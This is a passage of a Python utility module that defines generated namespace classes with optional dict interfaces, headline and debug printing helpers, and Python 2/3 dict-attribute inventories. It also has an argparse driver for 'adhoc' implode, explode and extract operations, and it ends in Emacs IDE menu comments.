                for_.__init__(self, *args, **kwargs)
        return namespace_
# Public factory alias.  The bare string below is informational only; it
# is not attached as a docstring to the function object.
NameSpaceMeta = NameSpaceNS.namespace # ||:cls:|| generator
'''Namespace (meta-) class generator.
NameSpaceMeta(for_=object, expose_dict=0)
'''
class NameSpace(NameSpaceMeta()):
    # @:adhoc_template:@
    '''Namespace class inheriting from object, without dict interface.
    Defined as: ``class NameSpace(NameSpaceMeta()):``'''
    # @:adhoc_template:@ -
    # all behavior comes from the generated base class
    pass
class NameSpaceDict(NameSpaceMeta(expose_dict=2)):
    # @:adhoc_template:@
    '''Namespace class inheriting from object, with complete dict interface.
    Defined as: ``class NameSpaceDict(NameSpaceMeta(expose_dict=2)):``'''
    # @:adhoc_template:@ -
    # all behavior comes from the generated base class
    pass
# @:adhoc_template:@
# --------------------------------------------------
# |||:sec:||| FUNCTIONS
# --------------------------------------------------
# (progn (forward-line 1) (snip-insert-mode "py.f.hl" t) (insert "\n"))
hlr = None
def hlcr(title=None, tag='|||' ':CHP:|||', rule_width=50, **kwargs): # ||:fnc:||
    '''Render a chapter-level headline as a string: a dashed rule,
    an optional tagged title line, and a closing dashed rule.'''
    comm = globals().get('dbg_comm') or '# '
    rule = comm + '-' * rule_width
    lines = [rule]
    if title:
        twid = globals().get('dbg_twid') or 9
        lines.append(sformat('{0}{2:^{1}} {3!s}', comm, twid, tag, title))
    lines.append(rule)
    return '\n'.join(lines)
def hlsr(title=None, tag='||' ':SEC:||', rule_width=35, **kwargs): # |:fnc:|
    '''Render a section-level headline (narrower rule, section tag).'''
    return hlcr(title=title, tag=tag, rule_width=rule_width)
def hlssr(title=None, tag='|' ':INF:|', rule_width=20, **kwargs): # |:fnc:|
    '''Render a sub-section-level headline (narrow rule, info tag).'''
    return hlcr(title=title, tag=tag, rule_width=rule_width)
def hlc(*args, **kwargs): # |:fnc:|
    '''Print a chapter-level headline to stderr, one line at a time.'''
    rendered = hlcr(*args, **kwargs)
    for line in rendered.splitlines():
        printe(line, **kwargs)
def hls(*args, **kwargs): # |:fnc:|
    '''Print a section-level headline to stderr, one line at a time.'''
    rendered = hlsr(*args, **kwargs)
    for line in rendered.splitlines():
        printe(line, **kwargs)
def hlss(*args, **kwargs): # |:fnc:|
    '''Print a sub-section-level headline to stderr, one line at a time.'''
    rendered = hlssr(*args, **kwargs)
    for line in rendered.splitlines():
        printe(line, **kwargs)
def hl(*args, **kwargs): # |:fnc:|
    '''Print a headline at the level currently selected by hl_lvl().'''
    rendered = hlr(*args, **kwargs)
    for line in rendered.splitlines():
        printe(line, **kwargs)
def hl_lvl(level=0): # |:fnc:|
    '''Select the renderer used by hl(): 0 selects the sub-section
    renderer, 1 the section renderer, anything else the chapter one.'''
    global hlr
    hlr = {0: hlssr, 1: hlsr}.get(level, hlcr)
hl_lvl(0)
# (progn (forward-line 1) (snip-insert-mode "py.f.single.quote" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.remove.match" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.printenv" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.uname-s" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.printe" t) (insert "\n"))
def printe(*args, **kwargs): # ||:fnc:||
    '''Like printf(), but the `file` keyword defaults to sys.stderr.'''
    kwargs.setdefault('file', sys.stderr)
    printf(*args, **kwargs)
# (progn (forward-line 1) (snip-insert-mode "py.f.dbg.squeeze" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.f.dbg.indent" t) (insert "\n"))
# (progn (forward-line -1) (insert "\n") (snip-insert-mode "py.s.func" t) (backward-symbol-tag 2 "fillme" "::"))
class NameSpaceCheck(object): # ||:cls:||
    '''Demonstration base class for NameSpaceMeta(): traces object
    construction, attribute access through ``_property_`` and
    destruction via debug output.'''
    def __init__(self, *args, **kwargs): # |:mth:|
        printf('# NameSpaceCheck.__init__ called')
        printe(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
            dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'args', args))
        printe(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
            dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'kwargs', kwargs))
        # _property_ is already available during __init__ (installed by
        # the generated class before the base __init__ runs)
        prop = self._property_
        self.args = args
        self.kwargs = kwargs
        super(NameSpaceCheck, self).__init__()
    def method(self): # |:mth:|
        printf('# NameSpaceCheck.method called')
        # dispatch the second method through the _property_ companion
        self._property_.method2()
    def method2(self): # |:mth:|
        printf('# NameSpaceCheck.method2 called')
    def __del__(self): # |:mth:|
        printf('# BYE, BYE from NameSpaceCheck')
        printe(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
            dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(self)', vars(self)))
def check_namespace_features(expose_dict=0): # ||:fnc:||
    '''Drive a namespace class derived from NameSpaceCheck through its
    property and (optional) dict interfaces; debug output only.'''
    hl(sformat('Check namespace features (expose_dict={0})',
               expose_dict))
    class nsdc (NameSpaceMeta(NameSpaceCheck, expose_dict)):
        pass
    nsd = nsdc('arg0', 'arg1', kwarg0='kw', kwarg1='kw')
    nsd._property_.method()
    if expose_dict > 1:
        # dict protocol is also available on the property object
        nsd._property_['dict'] = 'access'
        nsd._property_['keys'] = 'prop keys'
        keys = nsd._property_['keys']
        printe(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
            dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'prop keys', keys))
    if expose_dict:
        # dict method access vs. item access vs. attribute shadowing
        keys = nsd._property_.keys()
        printe(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
            dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'prop keys()', keys))
        nsd['keys'] = 'nsd keys'
        keys = nsd['keys']
        printe(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
            dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'nsd keys', keys))
        keys = nsd.keys()
        printe(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
            dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'nsd keys()', keys))
        nsd.keys = 'nsd attr keys'
        keys = nsd['keys']
        printe(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
            dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'nsd attr keys', keys))
        nsd.keys = 'nsd attr keys'
        keys = nsd.keys
        printe(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
            dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'nsd attr keys', keys))
    return
# --------------------------------------------------
# |||:sec:||| DICT ATTRIBUTES
# --------------------------------------------------
# |:here:|
# Attribute inventories of the builtin dict type per Python version,
# apparently produced with show_dict_methods(); `# AttributeError` marks
# names that are dict entries but not mappingproxy attributes.
python2_dict_attrs = [
    '__cmp__',
    '__contains__',
    '__delitem__', # AttributeError
    # '__doc__' # None,
    '__eq__',
    '__ge__',
    '__getitem__',
    '__gt__',
    '__hash__',
    '__iter__',
    '__le__',
    '__len__',
    '__lt__',
    '__ne__',
    '__setitem__', # AttributeError
    '__sizeof__',
    'clear', # AttributeError
    'copy',
    'fromkeys', # AttributeError
    'get',
    'has_key',
    'items',
    'iteritems',
    'iterkeys',
    'itervalues',
    'keys',
    'pop', # AttributeError
    'popitem', # AttributeError
    'setdefault', # AttributeError
    'update', # AttributeError
    'values',
    'viewitems', # AttributeError
    'viewkeys', # AttributeError
    'viewvalues', # AttributeError
    ]
python3_dict_attrs = [
    '__contains__',
    '__delitem__', # AttributeError
    # '__doc__' # None,
    '__eq__',
    '__ge__',
    '__getitem__',
    '__gt__',
    # '__hash__' # None,
    '__iter__',
    '__le__',
    '__len__',
    '__lt__',
    '__ne__',
    '__setitem__', # AttributeError
    '__sizeof__',
    'clear', # AttributeError
    'copy',
    'fromkeys', # AttributeError
    'get',
    'items',
    'keys',
    'pop', # AttributeError
    'popitem', # AttributeError
    'setdefault', # AttributeError
    'update', # AttributeError
    'values',
    ]
# Names present only in Python 2 / only in Python 3 (see the
# commented-out generator code in show_dict_methods()).
python2_unique = [
    '__cmp__',
    '__hash__',
    'has_key',
    'iteritems',
    'iterkeys',
    'itervalues',
    'viewitems',
    'viewkeys',
    'viewvalues',
    ]
python3_unique = [
    ]
# direct class lookup: # |:info:|
# :DBG:   dict op       : ]__cmp__    [ attribs used: ][][
# :DBG:   dict op       : ]__contains__[ attribs used: ][][
# :DBG:   dict op       : ]__delitem__ [ attribs used: ][][
# :DBG:   dict op       : ]__getitem__ [ attribs used: ][][
# :DBG:   dict op       : ]__iter__   [ attribs used: ][][
# :DBG:   dict op       : ]__len__    [ attribs used: ][][
# :DBG:   dict op       : ]__setitem__ [ attribs used: ][][
# lookup via __getattribute__: # |:info:|
# :DBG:   dict op       : ]clear      [ attribs used: ]['clear'][
# :DBG:   dict op       : ]copy       [ attribs used: ]['copy'][
# :DBG:   dict op       : ]fromkeys   [ attribs used: ]['fromkeys'][
# :DBG:   dict op       : ]get        [ attribs used: ]['get'][
# :DBG:   dict op       : ]items      [ attribs used: ]['items'][
# :DBG:   dict op       : ]keys       [ attribs used: ]['keys'][
# :DBG:   dict op       : ]pop        [ attribs used: ]['pop'][
# :DBG:   dict op       : ]popitem    [ attribs used: ]['popitem'][
# :DBG:   dict op       : ]setdefault [ attribs used: ]['setdefault'][
# :DBG:   dict op       : ]update     [ attribs used: ]['update'][
# :DBG:   dict op       : ]values     [ attribs used: ]['values'][
def show_dict_methods(as_methods=False): # ||:fnc:||
    '''Development helper: list the attributes of dict.__dict__, either
    as list-literal entries (default) or as forwarding method stubs
    (as_methods=True).  Output goes to stderr.'''
    # |:debug:| find Python2/3 unique methods
    # printf('python2_unique')
    # for attr in python2_dict_attrs:
    #     if attr not in python3_dict_attrs:
    #         python2_unique.append(attr)
    #         printe(sformat("    '{0}',", attr))
    # printf('python3_unique')
    # for attr in python3_dict_attrs:
    #     if attr not in python2_dict_attrs:
    #         python3_unique.append(attr)
    #         printe(sformat("    '{0}',", attr))
    # printf('done')
    known_dict_attrs = python2_dict_attrs
    ignore_dict_attrs = [
        '__getattribute__',
        '__init__',
        '__new__',
        '__repr__',
        ]
    # |:here:|
    for dattr in sorted(dict.__dict__):
        if dattr in ignore_dict_attrs:
            continue
        try:
            # NOTE(review): getattr on the mappingproxy object itself —
            # names that are dict entries but not mappingproxy
            # attributes raise AttributeError here.
            avalue = getattr(dict.__dict__, dattr)
            if hasattr(avalue, '__call__'):
                if not as_methods:
                    printe(sformat("    '{0}',", dattr))
            else:
                if not as_methods:
                    printe(sformat("#     '{0}' # {1},", dattr, avalue))
                continue
        except AttributeError:
            if not as_methods:
                printe(sformat("    '{0}', # AttributeError", dattr))
        if as_methods:
            printe(sformat("""\
            def {0}(self, *args, **kwargs):
                return getattr(self.__dict__, '{0}')(*args, **kwargs)
""", dattr))
def check_dict_methods(): # ||:fnc:||
    '''Development helper: exercise every dict operation on a NameSpace
    and report which attributes were routed through the namespace
    __getattribute__ (uses NameSpaceNS.known_dict_attrs as recorder).'''
    da_check_ = []
    da_checked = []
    def da_check_init():
        # reset the attribute-usage recorder before each operation
        del(da_check_[:])
        NameSpaceNS.known_dict_attrs = []
        da_check_.append(list(NameSpaceNS.known_dict_attrs))
    def da_check_report(for_='dict.something'):
        # report the attributes recorded since the last da_check_init()
        da_checked.append(for_)
        old_known = da_check_[0]
        new_attribs = []
        for attr in NameSpaceNS.known_dict_attrs:
            if attr not in old_known:
                new_attribs.append(attr)
        printe(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]{5!s:<12s}[ attribs used: ]{6!s}[",
            dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'dict op', for_, list(sorted(new_attribs))))
    ns = NameSpace()
    # |:here:|
    da_check_init()
    ns['setitem1'] = 'setitem value'
    ns['setitem2'] = 'setitem value'
    ns['setitem3'] = 'setitem value'
    ns['setitem4'] = 'setitem value'
    da_check_report('__setitem__')
    da_checked.extend(('__hash__',))
    da_check_init()
    x = ns['setitem1']
    da_check_report('__getitem__')
    da_check_init()
    del(ns['setitem4'])
    da_check_report('__delitem__')
    da_check_init()
    if 'some' in ns:
        pass
    da_check_report('__contains__')
    da_check_init()
    for x in ns:
        pass
    da_check_report('__iter__')
    da_check_init()
    x = len(ns)
    da_check_report('__len__')
    da_checked.extend(('__sizeof__',))
    da_check_init()
    for x in sorted(ns):
        pass
    da_check_report('__cmp__')
    da_checked.extend(('__eq__', '__ge__', '__gt__', '__le__', '__lt__', '__ne__',))
    da_check_init()
    for x in ns.keys():
        pass
    da_check_report('keys')
    da_check_init()
    for x in ns.values():
        pass
    da_check_report('values')
    da_check_init()
    for x in ns.items():
        pass
    da_check_report('items')
    it = list(ns.items())
    da_check_init()
    ns.update(it)
    da_check_report('update')
    da_check_init()
    pop = ns.get('setitem6', 'None')
    da_check_report('get')
    da_check_init()
    pop = ns.setdefault('setitem1', 'None')
    da_check_report('setdefault')
    da_check_init()
    pop = ns.fromkeys(['a', 'b', 'c'])
    da_check_report('fromkeys')
    da_check_init()
    pop = ns.pop('setitem1')
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'pop', pop))
    da_check_report('pop')
    da_check_init()
    pop = ns.popitem()
    da_check_report('popitem')
    try:
        # python2 unique
        da_check_init()
        it = ns.iterkeys()
        da_check_report('iterkeys')
        da_check_init()
        it = ns.itervalues()
        da_check_report('itervalues')
        da_check_init()
        it = ns.iteritems()
        da_check_report('iteritems')
        da_check_init()
        it = ns.viewkeys()
        da_check_report('viewkeys')
        da_check_init()
        it = ns.viewvalues()
        da_check_report('viewvalues')
        da_check_init()
        it = ns.viewitems()
        da_check_report('viewitems')
    except AttributeError:
        # Python 3: the py2-only methods are counted as checked anyway
        da_checked.extend(('iterkeys', 'itervalues', 'iteritems', ))
        da_checked.extend(('viewkeys', 'viewvalues', 'viewitems', ))
        da_checked.extend(('has_key',))
    da_check_init()
    cp = ns.copy()
    da_check_report('copy')
    da_check_init()
    ns.clear()
    da_check_report('clear')
    for attr in python2_dict_attrs:
        if attr not in da_checked:
            printe(sformat(
                "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
                dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'unchecked', attr))
    # |:here:|
# |:here:|
def run(parameters, pass_opts): # ||:fnc:||
    """Application runner, when called as __main__.

    Demonstrates the NameSpace features on stderr; `parameters` and
    `pass_opts` come from main() and are currently unused here.
    """
    # (progn (forward-line 1) (snip-insert-mode "py.bf.sql.ws" t) (insert "\n"))
    # (progn (forward-line 1) (snip-insert-mode "py.bf.file.arg.loop" t) (insert "\n"))
    # Reference class with a plain read-only property (unused demo).
    # NOTE(review): `name` plays the role of `self` in these methods.
    class x(object): # ||:cls:||
        def get_prop(name): # |:mth:|
            return 'prop'
        def set_prop(name, value): # |:mth:|
            return
        prop = property(get_prop)
    #x().prop = 55
    #delattr(x(), 'prop')
    # show_dict_methods()
    # check_dict_methods()
    # exit(0)
    # |:here:|
    ns = NameSpace()
    ns2 = NameSpace()
    # |:sec:|
    hl('Basic namespace features')
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'ns.__class__',
        ns.__class__.__name__))
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'is..(ns, dict)',
        isinstance(ns, dict)))
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'is..(vars(ns), dict)',
        isinstance(vars(ns), dict)))
    check_namespace_features(0)
    check_namespace_features(1)
    check_namespace_features(2)
    hl('Set attributes on two namespaces (each is separate!)') # |:sec:|
    ns.test = 55
    ns2.test2 = -5
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'ns.test', ns.test))
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'ns2.test2', ns2.test2))
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns)', vars(ns)))
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns2)', vars(ns2)))
    hl('Set attributes via vars()') # |:sec:|
    vars(ns)['hello'] = True
    vars(ns)['world'] = True
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns)', vars(ns)))
    hl('Access to the namespace class object') # |:sec:|
    prop = ns._property_
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'ns._property_', prop))
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'prop.__class__',
        prop.__class__))
    # attributes set on the property object land in its own __dict__,
    # not in the namespace dict
    prop.new_attr = 'new_attr'
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'prop.new_attr', prop.new_attr))
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'prop.__dict__', prop.__dict__))
    hl('The namespaces are not affected') # |:sec:|
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns)', vars(ns)))
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns2)', vars(ns2)))
    hl('Set special property __dict__') # |:sec:|
    new_dict = {'new': 0, 'dict': 1}
    ns.__dict__ = new_dict
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns)', vars(ns)))
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'new_dict', new_dict))
    ns.test = 'needed for delattr test'
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'ns.test', ns.test))
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns)', vars(ns)))
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'new_dict', new_dict))
    hl('Set special attribute __class__') # |:sec:|
    try:
        ns.__class__ = "can't do this"
    except AttributeError:
        (t, e, tb) = sys.exc_info()
        import traceback
        printe(''.join(traceback.format_tb(tb)), end='')
        printe(sformat('{0}: {1}', t.__name__, e))
        del(tb)
        pass
    hl('Delete `test` attribute') # |:sec:|
    delattr(ns, 'test')
    printe(sformat(
        "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[",
        dbg_comm, dbg_twid, dbg_fwid, ':DBG:', 'vars(ns)', vars(ns)))
    hl('Access non-existent attribute test') # |:sec:|
    try:
        ns.test
    except AttributeError:
        (t, e, tb) = sys.exc_info()
        import traceback
        printe(''.join(traceback.format_tb(tb)), end='')
        printe(sformat('{0}: {1}', t.__name__, e))
        del(tb)
        pass
    hl('Delete non-existent attribute test') # |:sec:|
    try:
        delattr(ns, 'test')
    except AttributeError:
        (t, e, tb) = sys.exc_info()
        import traceback
        printe(''.join(traceback.format_tb(tb)), end='')
        printe(sformat('{0}: {1}', t.__name__, e))
        del(tb)
        pass
    hl('Delete special attribute __dict__') # |:sec:|
    try:
        delattr(ns, '__dict__')
    except AttributeError:
        (t, e, tb) = sys.exc_info()
        import traceback
        printe(''.join(traceback.format_tb(tb)), end='')
        printe(sformat('{0}: {1}', t.__name__, e))
        del(tb)
        pass
    # |:here:|
    pass
# --------------------------------------------------
# |||:sec:||| MAIN
# --------------------------------------------------
# Module-level verbosity flags, adjusted by main() from the -q/-v/-d
# options.
_quiet = False
_verbose = False
_debug = False
# (progn (forward-line 1) (snip-insert-mode "py.f.setdefaultencoding" t) (insert "\n"))
# When True, the file is known to be encoding-clean and the Python 2
# setdefaultencoding() workaround below is skipped entirely.
file_encoding_is_clean = True
def setdefaultencoding(encoding=None, quiet=False):
    '''Python 2 only: force the interpreter default encoding.

    No-op when `file_encoding_is_clean` is set or under Python 3 (where
    `basestring` does not exist and UTF-8 is already the default).
    '''
    if file_encoding_is_clean:
        return
    if encoding is None:
        encoding='utf-8'
    try:
        isinstance('', basestring)
        if not hasattr(sys, '_setdefaultencoding'):
            if not quiet:
                printf('''\
Add this to /etc/python2.x/sitecustomize.py,
or put it in local sitecustomize.py and adjust PYTHONPATH=".:${PYTHONPATH}"::
    try:
        import sys
        setattr(sys, '_setdefaultencoding', getattr(sys, 'setdefaultencoding'))
    except AttributeError:
        pass
Running with reload(sys) hack ...
''', file=sys.stderr)
            # reload(sys) restores the setdefaultencoding attribute that
            # site.py removes at startup (Python 2 hack)
            reload(sys)
            setattr(sys, '_setdefaultencoding',
                    getattr(sys, 'setdefaultencoding'))
        sys._setdefaultencoding(encoding)
    except NameError:
        # python3 already has utf-8 default encoding ;-)
        pass
def main(argv): # ||:fnc:||
    '''Program driver.

    Parses known options from `argv`, dispatches the adhoc implode /
    explode / extract / template operations, optionally runs the doc
    tests, and otherwise delegates to :func:`run`.  Unknown options
    are collected and passed through to run().  Returns an exit code
    for the option-handling paths (None after run()).
    '''
    global _quiet, _debug, _verbose
    global RtAdHoc, AdHoc
    _parameters = None
    _pass_opts = []
    try:
        import argparse
    except ImportError:
        try:
            # fall back to a locally bundled copy
            import argparse_local as argparse
        except ImportError:
            printe('error: argparse missing. Try `easy_install argparse`.')
            sys.exit(1)
    parser = argparse.ArgumentParser(add_help=False)
    # parser.add_argument('--sum', dest='accumulate', action='store_const',
    #                     const=sum, default=max,
    #                     help='sum the integers (default: find the max)')
    # |:opt:| add options
    parser.add_argument(
        '-q', '--quiet', action='store_const', const=-2,
        dest='debug', default=0, help='suppress warnings')
    parser.add_argument(
        '-v', '--verbose', action='store_const', const=-1,
        dest='debug', default=0, help='verbose test output')
    parser.add_argument(
        '-d', '--debug', nargs='?', action='store', type=int, metavar='NUM',
        default = 0, const = 1,
        help='show debug information')
    parser.add_argument(
        '-t', '--test', action='store_true',
        help='run doc tests')
    class AdHocAction(argparse.Action):
        '''argparse action making --implode/--explode/--extract/--template
        mutually exclusive and recording the option argument.'''
        def __call__(self, parser, namespace, values, option_string=None):
            # BUGFIX: the original reset the flags with map(); map() is
            # lazy under Python 3, so the setattr calls never executed.
            for opt in ('implode', 'explode', 'extract', 'template'):
                setattr(namespace, opt, False)
            setattr(namespace, option_string[2:], True)
            setattr(namespace, 'adhoc_arg', values)
    parser.add_argument(
        '--implode', nargs=0, action=AdHocAction, default=False,
        help='implode script with adhoc')
    parser.add_argument(
        '--explode', nargs='?', action=AdHocAction, type=str, metavar='DIR',
        default=False, const='__adhoc__',
        help='explode script with adhoc in directory DIR'
        ' (default: `__adhoc__`)')
    parser.add_argument(
        '--extract', nargs='?', action=AdHocAction, type=str, metavar='DIR',
        default=False, const = '.',
        help='extract files to directory DIR (default: `.`)')
    parser.add_argument(
        '--template', nargs='?', action=AdHocAction, type=str, metavar='NAME',
        default=False, const = '-',
        help='extract named template to standard output. default NAME is ``-``')
    parser.add_argument(
        '-h', '--help', action='store_true',
        help="display this help message")
    parser.add_argument(
        '--ap-help', action='store_true',
        help="internal help message")
    parser.add_argument(
        'args', nargs='*', metavar='arg',
        #'args', nargs='+', metavar='arg',
        #type=argparse.FileType('r'), default=sys.stdin,
        help='a series of arguments')
    #_parameters = parser.parse_args()
    (_parameters, _pass_opts) = parser.parse_known_args(argv[1:])
    # generate argparse help
    if _parameters.ap_help:
        parser.print_help()
        return 0
    # standard help
    # NOTE(review): assumes the module docstring is set; it is written
    # verbatim as the help text.
    if _parameters.help:
        sys.stdout.write(__doc__)
        return 0
    # fold the single numeric debug option into the three module flags
    _debug = _parameters.debug
    if _debug > 0:
        _verbose = True
        _quiet = False
    elif _debug < 0:
        _verbose = (_debug == -1)
        _quiet = not(_verbose)
        _debug = 0
    _parameters.debug = _debug
    _parameters.verbose = _verbose
    _parameters.quiet = _quiet
    if _debug:
        cmd_line = argv
        sys.stderr.write(sformat(
            "{0}{3:^{1}} {4:<{2}s}: ]{5!s}[\n",
            ((('dbg_comm' in globals()) and (globals()['dbg_comm'])) or ('# ')),
            ((('dbg_twid' in globals()) and (globals()['dbg_twid'])) or (9)),
            ((('dbg_fwid' in globals()) and (globals()['dbg_fwid'])) or (15)),
            ':DBG:', 'cmd_line', cmd_line))
    # at least use `quiet` to suppress the setdefaultencoding warning
    setdefaultencoding(quiet=_quiet or _parameters.test)
    # |:opt:| handle options
    # adhoc: implode/explode/extract
    adhoc_export = (_parameters.explode or _parameters.extract)
    adhoc_op = (_parameters.implode or adhoc_export or _parameters.template)
    if adhoc_op:
        file_ = __file__
        source = None
        have_adhoc = 'AdHoc' in globals()
        have_rt_adhoc = 'RtAdHoc' in globals()
        # shall adhoc be imported
        if _parameters.implode or not have_rt_adhoc:
            # shall this file be compiled
            adhoc_compile = not (have_rt_adhoc)
            # make the adhoc compiler findable via PATH as well
            os_path = os.defpath
            for pv in ('PATH', 'path'):
                try:
                    os_path = os.environ[pv]
                    break
                except KeyError:
                    pass
            os_path = os_path.split(os.pathsep)
            for path_dir in os_path:
                if not path_dir:
                    continue
                if path_dir not in sys.path:
                    sys.path.append(path_dir)
            if not have_adhoc:
                try:
                    import adhoc
                    AdHoc = adhoc.AdHoc
                except ImportError:
                    adhoc_compile = False
                    try:
                        # BUGFIX: was bound ``as Adhoc`` (typo), leaving
                        # the name `AdHoc` (used below) undefined.
                        from rt_adhoc import RtAdHoc as AdHoc
                    except ImportError:
                        pass
        else:
            adhoc_compile = False
            AdHoc = RtAdHoc
        AdHoc.quiet = _quiet
        AdHoc.verbose = _verbose
        AdHoc.debug = _debug
        AdHoc.include_path.append(os.path.dirname(file_))
        if adhoc_compile:
            ah = AdHoc()
            source = ah.compileFile(file_)
        else:
            file_, source = AdHoc.std_source_param(file_)
        # implode
        if _parameters.implode:
            # @:adhoc_enable:@
            # if not _quiet:
            #     map(sys.stderr.write,
            #         ["warning: ", os.path.basename(file_),
            #          " already imploded!\n"])
            # @:adhoc_enable:@
            AdHoc.write_source('-', source)
        # explode
        elif _parameters.explode:
            AdHoc.export_dir = _parameters.adhoc_arg
            AdHoc.export(file_, source)
        # extract
        elif _parameters.extract:
            AdHoc.extract_dir = _parameters.adhoc_arg
            AdHoc.extract(file_, source)
        # template
        elif _parameters.template:
            template_name = _parameters.adhoc_arg
            if not template_name:
                template_name = '-'
            if template_name == 'list':
                sys.stdout.write(
                    '\n'.join(AdHoc.template_table(file_, source)) + '\n')
            else:
                template = AdHoc.get_named_template(
                    template_name, file_, source)
                AdHoc.write_source('-', template)
        # restore for subsequent calls to main
        if not have_adhoc:
            del(AdHoc)
        return 0
    # run doc tests
    if _parameters.test:
        import doctest
        doctest.testmod(verbose = _verbose)
        return 0
    # |:opt:| handle options
    run(_parameters, _pass_opts)
if __name__ == "__main__":
    # Script entry point: exit with main()'s return code.
    #sys.argv.insert(1, '--debug') # |:debug:|
    sys.exit(main(sys.argv))
# |:here:|
# (progn (forward-line 1) (snip-insert-mode "py.t.ide" t) (insert "\n"))
#
# :ide-menu: Emacs IDE Main Menu - Buffer @BUFFER@
# . M-x `eIDE-menu' (eIDE-menu "z")
# :ide: CSCOPE ON
# . (cscope-minor-mode)
# :ide: CSCOPE OFF
# . (cscope-minor-mode (quote ( nil )))
# :ide: TAGS: forced update
# . (compile (concat "cd /home/ws/project/ws-rfid && make -k FORCED=1 tags"))
# :ide: TAGS: update
# . (compile (concat "cd /home/ws/project/ws-rfid && make -k tags"))
# :ide: +-#+
# . Utilities ()
# :ide: TOC: Generate TOC with py-toc.py
# . (progn (save-buffer) (compile (concat "py-toc.py ./" (file-name-nondirectory (buffer-file-name)) " ")))
# :ide: CMD: Fold region with line continuation
# . (shell-command-on-region (region-beginning) (region-end) "fold --spaces -width 79 | sed 's, $,,;1!s,^, ,;$!s,$,\\\\,'" nil nil nil t)
# :ide: CMD: Fold region and replace with line continuation
# . (shell-command-on-region (region-beginning) (region-end) "fold --spaces --width 79 | sed 's, $,,;1!s,^, ,;$!s,$,\\\\,'" t nil nil t)
# :ide: +-#+
# . Fold ()
# :ide: CMD: Remove 8 spaces and add `>>> ' to region
# . (shell-command-on-region (region-beginning) (region-end) "sed 's,^ ,,;/^[ ]*##/d;/^[ ]*#/{;s,^ *# *,,p;d;};/^[ ]*$/!s,^,>>> ,'" nil nil nil t)
# :ide: CMD: Remove 4 spaces and add `>>> ' to region
